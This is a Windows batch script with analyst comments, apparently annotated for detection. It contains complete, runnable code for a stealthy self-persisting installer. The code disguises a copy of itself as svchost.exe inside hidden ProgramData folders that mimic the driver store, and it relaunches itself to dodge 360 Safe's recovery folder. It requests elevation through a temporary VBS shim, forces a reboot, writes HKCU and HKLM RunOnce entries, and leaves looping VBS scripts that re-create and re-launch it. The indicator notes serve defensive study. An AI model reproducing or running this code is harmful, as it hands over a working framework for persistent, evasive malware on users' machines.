@echo off
setlocal enabledelayedexpansion
:: Analyst overview of this file: it stages a copy of itself under
:: ProgramData\Microsoft in a folder named DriverStore_NNNNNN$ with a random
:: six-digit suffix, asks for elevation through a temporary VBS shim, writes
:: RunOnce values under HKCU and HKLM, and leaves two looping VBS scripts
:: running that re-create and re-launch the payload. The folder name pattern,
:: the RunOnce value names SysDiag and DriverStoreMaintenance, and an
:: svchost.exe copy living outside the Windows directory are the indicators
:: most useful for detection.
:: ====== Enhanced disguise settings ======
set "STEALTH_MODE=1"
:: Three concatenated random numbers; only the last six characters are used below.
set "RND_PREFIX=!random!!random!!random!"
:: Folder name mimics the driver store; the trailing $ is literal.
set "SAFE_FOLDER=DriverStore_!RND_PREFIX:~-6!$"
set "INSTALL_DIR=%ProgramData%\Microsoft\%SAFE_FOLDER%"
:: Written once by create_guardian; nothing in this script reads it back.
set "HWID_FILE=%INSTALL_DIR%\.system.dat"
set "RECOVERY_FLAG=0"
:: ====== 360 bypass technique ======
:: Two behaviours worth instrumenting: if a copy of this script is found in
:: the 360 Safe "Recover" folder it copies itself to TEMP and relaunches from
:: there, and it drops a decoy drvcfg.inf then marks the install folder and
:: the decoy system+hidden. Watching for attrib +s +h on ProgramData
:: subfolders and for scripts executed out of TEMP covers both paths.
:init_stealth
if defined STEALTH_MODE (
:: Check whether this script is sitting in the 360 recovery area
if exist "C:\ProgramData\360safe\Recover\%~nx0" (
set "RECOVERY_FLAG=1"
copy "C:\ProgramData\360safe\Recover\%~nx0" "%temp%\%~nx0" >nul
start "" "%temp%\%~nx0"
exit
)
:: Create a harmless-looking system file as a decoy
if not exist "%INSTALL_DIR%\" (
mkdir "%INSTALL_DIR%"
echo ; Windows Driver Configuration > "%INSTALL_DIR%\drvcfg.inf"
echo [Version] >> "%INSTALL_DIR%\drvcfg.inf"
echo Signature="$WINDOWS NT$" >> "%INSTALL_DIR%\drvcfg.inf"
echo Class=System >> "%INSTALL_DIR%\drvcfg.inf"
echo ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} >> "%INSTALL_DIR%\drvcfg.inf"
attrib +s +h +r "%INSTALL_DIR%"
attrib +s +h "%INSTALL_DIR%\drvcfg.inf"
)
:: Choose legitimate-looking process and script names
set "SAFE_PROC=svchost.exe"
set "SAFE_SCRIPT=winsys.vbe"
)
:: ====== Administrator privilege check ======
:: NET FILE is used as an elevation probe. Without elevation the script writes
:: a short VBS into TEMP that re-runs this file with the "runas" verb and the
:: "admin" argument, runs it with wscript, deletes it and exits. Despite the
:: uac_bypass_NNNNN.vbs file name this is an ordinary ShellExecute "runas"
:: request, which on a default UAC configuration shows the consent prompt.
:: The observable is cmd.exe spawning wscript.exe on a freshly written TEMP
:: file whose name starts with uac_bypass_.
echo Performing system diagnostics...
NET FILE >NUL 2>&1
if '%errorlevel%' NEQ '0' (
echo Requesting administrator privileges...
:: Alternative UAC elevation method
set "UAC_SCRIPT=%temp%\uac_bypass_!random!.vbs"
(
echo Set UAC = CreateObject^("Shell.Application"^)
echo UAC.ShellExecute "cmd.exe", "/c ""%~f0"" admin", "", "runas", 0
) > "%UAC_SCRIPT%"
wscript //B "%UAC_SCRIPT%"
del /f /q "%UAC_SCRIPT%" >nul 2>&1
exit /b
)
echo.
:: ====== Staged install flow ======
:: Dispatch on the first argument. "admin", "stage2" and "stage3" are the
:: values this script passes to itself in the relaunch lines further down;
:: recovery_mode is reached only when RECOVERY_FLAG was set to 1 above.
if "%1"=="admin" goto admin_mode
if "%1"=="stage2" goto stage2
if "%1"=="stage3" goto stage3
if "%RECOVERY_FLAG%"=="1" goto recovery_mode
:install
:: Stage 1: benign-looking preparation
echo Scanning system files... Please wait.
timeout /t 3 >nul
:: Writes Diagnostics=1 under HKCU ...\CurrentVersion\Applets. Its purpose is
:: not evident from this script; a registry monitor can still key on it.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Applets" /v Diagnostics /t REG_DWORD /d 1 /f >nul
:: Stage 2: hand the sensitive operations to a minimized child cmd and return
start /min "" cmd /c "%~f0" stage2
exit /b
:stage2
:: Random delay to avoid detection: random mod 10 plus 5 gives 5 to 14 seconds
set /a delay=!random! %% 10 + 5
timeout /t %delay% >nul
:: Startup method replacing WMI: an HKCU RunOnce value named SysDiag that runs
:: this file with the "stage3" argument after the forced reboot below. A
:: RunOnce write immediately followed by shutdown /r /f /t 0 from a
:: non-interactive cmd.exe is a high-signal pair for detection.
set "currentPath=%~f0"
set "safeCmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v SysDiag /t REG_SZ /d \"\""%currentPath%"\" stage3\" /f"
%safeCmd%
shutdown /r /f /t 0
exit /b
:stage3
:: Core install flow, entered from the SysDiag RunOnce value after reboot.
:: Stops if install_core_components returns a non-zero code.
call :install_core_components
if errorlevel 1 exit /b 1
:: Create the guardian process
call :create_guardian
exit /b
:admin_mode
:: Install flow when launched elevated with the "admin" argument; same two
:: steps as stage3 but without the reboot round trip.
call :install_core_components
if errorlevel 1 exit /b 1
call :create_guardian
exit /b
:recovery_mode
:: Entered when RECOVERY_FLAG is 1. Unlike stage3 and admin_mode, the return
:: code of install_core_components is not checked before the guardian starts.
echo System recovery mode activated...
timeout /t 3 >nul
call :install_core_components
call :create_guardian
exit /b
:: ====== Core component installation ======
:: Subroutine. Artifacts it leaves behind, all under INSTALL_DIR unless noted:
:: svchost.exe, a copy of this batch file with system+hidden attributes;
:: winsys.vbe, certutil base64 output of a two-line VBS; restore.vbs, a loop
:: that re-creates both; an HKLM RunOnce value DriverStoreMaintenance that
:: starts restore.vbs; and a transient SysTask.reg in TEMP. Returns 0.
:install_core_components
:: Disguise as a system tool: an svchost.exe that is really this .bat, placed
:: under ProgramData rather than the Windows directory.
copy /y "%~f0" "%INSTALL_DIR%\%SAFE_PROC%" >nul
attrib +s +h "%INSTALL_DIR%\%SAFE_PROC%"
:: Create an encoded script to avoid detection. The VBS only runs a hidden
:: cmd that echoes a maintenance message. certutil -encode writes base64
:: with certificate-style header and footer lines, so winsys.vbe is a base64
:: text blob of that VBS rather than a Microsoft script-encoded file; the
:: certutil -encode invocation itself is a common living-off-the-land signal.
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\tmp.vbs"
echo objWSH.Run "cmd /c echo System maintenance in progress...", 0 >> "%INSTALL_DIR%\tmp.vbs"
certutil -encode "%INSTALL_DIR%\tmp.vbs" "%INSTALL_DIR%\%SAFE_SCRIPT%" >nul
del "%INSTALL_DIR%\tmp.vbs"
:: Create the self-restore script: every 30 seconds, if winsys.vbe is missing,
:: copy this file to svchost.exe again and run certutil -encode on that copy.
:: Note the restored winsys.vbe is an encoding of the .bat copy, not of the
:: two-line VBS written above.
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\restore.vbs"
echo Set fso = CreateObject("Scripting.FileSystemObject") >> "%INSTALL_DIR%\restore.vbs"
echo Do >> "%INSTALL_DIR%\restore.vbs"
echo On Error Resume Next >> "%INSTALL_DIR%\restore.vbs"
echo If Not fso.FileExists("%INSTALL_DIR%\%SAFE_SCRIPT%") Then >> "%INSTALL_DIR%\restore.vbs"
echo fso.CopyFile "%~f0", "%INSTALL_DIR%\%SAFE_PROC%" >> "%INSTALL_DIR%\restore.vbs"
echo objWSH.Run "cmd /c certutil -encode ""%INSTALL_DIR%\%SAFE_PROC%"" ""%INSTALL_DIR%\%SAFE_SCRIPT%""", 0, True >> "%INSTALL_DIR%\restore.vbs"
echo End If >> "%INSTALL_DIR%\restore.vbs"
echo WScript.Sleep 30000 >> "%INSTALL_DIR%\restore.vbs"
echo Loop >> "%INSTALL_DIR%\restore.vbs"
:: Create the persistence entry via an alternative method: a .reg file in
:: TEMP imported with reg import, adding HKLM RunOnce value
:: DriverStoreMaintenance that launches restore.vbs hidden. reg import of a
:: file from TEMP and HKLM RunOnce writes are both worth alerting on.
echo Windows Registry Editor Version 5.00 > "%temp%\SysTask.reg"
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] >> "%temp%\SysTask.reg"
echo "DriverStoreMaintenance"="wscript.exe //B \"%INSTALL_DIR%\\restore.vbs\"" >> "%temp%\SysTask.reg"
reg import "%temp%\SysTask.reg" >nul
del "%temp%\SysTask.reg"
:: Start the restore monitor immediately, without waiting for the RunOnce
start /b wscript.exe //B "%INSTALL_DIR%\restore.vbs"
exit /b 0
:: ====== Guardian process creation ======
:: Subroutine. Records a machine identifier to HWID_FILE, writes guardian.vbs
:: and starts it, then starts winsys.vbe once. The resident wscript.exe that
:: spawns another wscript.exe every 60 seconds is the process-tree signature
:: to look for.
:create_guardian
:: Hardware binding: take the SMBIOS UUID from wmic, or fall back to
:: COMPUTERNAME plus a random number. The value is written but nothing in
:: this script reads HWID_FILE afterwards.
set "hwid="
for /f "skip=1" %%i in ('wmic csproduct get uuid 2^>nul') do if not defined hwid set "hwid=%%i"
if not defined hwid set "hwid=%COMPUTERNAME%_%RANDOM%"
echo !hwid! > "%HWID_FILE%"
:: Create the guardian via an alternative method: a VBS loop that launches
:: winsys.vbe hidden with wscript every 60 seconds, errors suppressed.
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\guardian.vbs"
echo Do >> "%INSTALL_DIR%\guardian.vbs"
echo On Error Resume Next >> "%INSTALL_DIR%\guardian.vbs"
echo objWSH.Run "wscript.exe //B ""%INSTALL_DIR%\%SAFE_SCRIPT%""", 0, False >> "%INSTALL_DIR%\guardian.vbs"
echo WScript.Sleep 60000 >> "%INSTALL_DIR%\guardian.vbs"
echo Loop >> "%INSTALL_DIR%\guardian.vbs"
:: Silently start the guardian
start /b wscript.exe //B "%INSTALL_DIR%\guardian.vbs"
:: Start the core script once directly
start /b wscript.exe //B "%INSTALL_DIR%\%SAFE_SCRIPT%"
echo Installation completed successfully.
timeout /t 2 >nul
exit /b